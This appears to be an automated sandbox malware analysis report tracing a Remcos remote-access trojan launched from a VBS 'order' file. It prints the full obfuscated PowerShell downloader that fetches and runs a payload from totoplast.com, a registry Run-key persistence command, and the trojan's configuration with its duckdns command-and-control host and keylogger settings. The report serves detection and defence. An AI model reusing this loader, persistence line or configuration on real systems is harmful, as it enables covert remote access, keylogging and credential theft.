HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)", ProcessId: 6516, ProcessName: cmd.exe
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order_MG2027176.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order_MG2027176.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order_MG2027176.vbs", ProcessId: 5928, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk ca kRegeeDevirDocunBacoe StasVe d]disc=Kass$UnomSHavot O,

                Stealing of Sensitive Information

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 4064, TargetFilename: C:\ProgramData\remcos\logs.dat
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-21T17:05:59.999554+020020365941Malware Command and Control Activity Detected192.168.2.865097185.157.163.13553848TCP
                2024-10-21T17:06:01.609921+020020365941Malware Command and Control Activity Detected192.168.2.865098185.157.163.13553848TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-21T17:06:01.532239+020028033043Unknown Traffic192.168.2.865099178.237.33.5080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-21T17:05:53.536564+020028032702Potentially Bad Traffic192.168.2.849716192.185.113.96443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 0000000B.00000002.2768909319.00000000007B9000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["renajazinw.duckdns.org:53848:1"], "Assigned name": "50", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "Application path", "Copy file": "Windeep.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-N1P6UN", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "AppDir", "Keylog folder": "remcos"}
                Source: Yara matchFile source: 0000000B.00000002.2768503378.000000000079E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2768909319.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2760236135.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2760236135.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2765820864.000000000014F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2768909319.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                Source: unknownHTTPS traffic detected: 192.185.113.96:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.185.113.96:443 -> 192.168.2.8:49716 version: TLS 1.2
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1807185035.0000000007F00000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000006.00000002.1799974907.0000000006E29000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000006.00000002.1799974907.0000000006E67000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: m.Core.pdbgf~& source: powershell.exe, 00000006.00000002.1799974907.0000000006E67000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232D10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_232D10F1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232D6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,11_2_232D6580
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040AE51 FindFirstFileW,FindNextFileW,18_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898

                Software Vulnerabilities

                barindex
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:65097 -> 185.157.163.135:53848
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:65098 -> 185.157.163.135:53848
                Source: Malware configuration extractorURLs: renajazinw.duckdns.org
                Source: unknownDNS query: name: renajazinw.duckdns.org
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
                Source: global trafficTCP traffic: 192.168.2.8:65097 -> 185.157.163.135:53848
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 192.185.113.96 192.185.113.96
                Source: Joe Sandbox ViewIP Address: 192.185.113.96 192.185.113.96
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:65099 -> 178.237.33.50:80
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49716 -> 192.185.113.96:443
                Source: global trafficHTTP traffic detected: GET /r5/Costiform.ocx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: totoplast.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /r5/JfcplHmBpoWXVfH37.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: totoplast.comCache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: unknownTCP traffic detected without corresponding DNS query: 185.157.163.135
                Source: global trafficHTTP traffic detected: GET /r5/Costiform.ocx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: totoplast.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /r5/JfcplHmBpoWXVfH37.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: totoplast.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: msiexec.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: global trafficDNS traffic detected: DNS query: gormezl_6777.6777.6777.677e
                Source: global trafficDNS traffic detected: DNS query: totoplast.com
                Source: global trafficDNS traffic detected: DNS query: renajazinw.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: wscript.exe, 00000000.00000003.1523125997.0000024A7C6C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1522729702.0000024A7C6BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1527899974.0000024A7C6C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: wscript.exe, 00000000.00000003.1523125997.0000024A7C6C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1522729702.0000024A7C6BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1527899974.0000024A7C6C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: wscript.exe, 00000000.00000003.1510495746.0000024A7C73D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1510411398.0000024A7C715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?fd4cfac06bb29
                Source: wscript.exe, 00000000.00000003.1523125997.0000024A7C6C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1522729702.0000024A7C6BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1527899974.0000024A7C6C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabR
                Source: wscript.exe, 00000000.00000003.1510495746.0000024A7C73D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1510411398.0000024A7C715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?fd4cfac06b
                Source: powershell.exe, 00000004.00000002.1668201842.00000196A8183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1789323939.00000000055EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000006.00000002.1772557768.00000000046D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000004.00000002.1644672636.0000019698111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1772557768.0000000004581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.1644672636.0000019699E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://totoplast.com
                Source: powershell.exe, 00000006.00000002.1772557768.00000000046D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: msiexec.exeString found in binary or memory: http://www.ebuddy.com
                Source: msiexec.exeString found in binary or memory: http://www.imvu.com
                Source: powershell.exe, 00000006.00000002.1799974907.0000000006E7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: msiexec.exeString found in binary or memory: http://www.nirsoft.net/
                Source: powershell.exe, 00000004.00000002.1644672636.0000019698111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000006.00000002.1772557768.0000000004581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000006.00000002.1789323939.00000000055EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000006.00000002.1789323939.00000000055EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000006.00000002.1789323939.00000000055EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000006.00000002.1772557768.00000000046D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000006.00000002.1799974907.0000000006ED0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.micd
                Source: powershell.exe, 00000004.00000002.1644672636.0000019698CC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: powershell.exe, 00000004.00000002.1668201842.00000196A8183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1789323939.00000000055EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000004.00000002.1644672636.0000019699E8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1644672636.0000019698336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://totoplast.com
                Source: powershell.exe, 00000004.00000002.1644672636.0000019698336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://totoplast.com/r5/Costiform.ocxP
                Source: powershell.exe, 00000006.00000002.1772557768.00000000046D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://totoplast.com/r5/Costiform.ocxXRtl
                Source: msiexec.exeString found in binary or memory: https://www.google.com
                Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownHTTPS traffic detected: 192.185.113.96:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.185.113.96:443 -> 192.168.2.8:49716 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Windows\SysWOW64\msiexec.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0041183A OpenClipboard,GetLastError,18_2_0041183A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,18_2_0040987A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_004098E2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,19_2_00406DFC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,19_2_00406E9F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,20_2_004068B5
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,20_2_004072B5

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 0000000B.00000002.2768503378.000000000079E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2768909319.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2760236135.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2760236135.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2765820864.000000000014F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2768909319.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Source: amsi32_5308.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5976, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5308, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk ca
